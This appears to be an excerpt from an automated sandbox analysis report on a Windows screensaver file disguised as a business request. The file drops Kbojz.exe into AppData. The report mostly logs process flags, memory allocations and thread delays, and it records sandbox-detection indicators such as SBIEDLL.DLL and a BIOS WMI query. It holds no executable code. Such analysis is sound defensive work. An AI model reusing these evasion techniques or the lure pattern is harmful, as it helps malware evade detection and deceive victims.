Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 20E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 1DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 6010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 7010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 2250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 22D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 5F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 6F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 2210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 1F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 5D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 6D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 1E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 22F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 740000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 1F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 2270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 1F0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Window / User API: threadDelayed 9241	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Window / User API: threadDelayed 563	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Window / User API: threadDelayed 4303	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Window / User API: threadDelayed 1532	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Window / User API: threadDelayed 762	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Window / User API: threadDelayed 5907	Jump to behavior
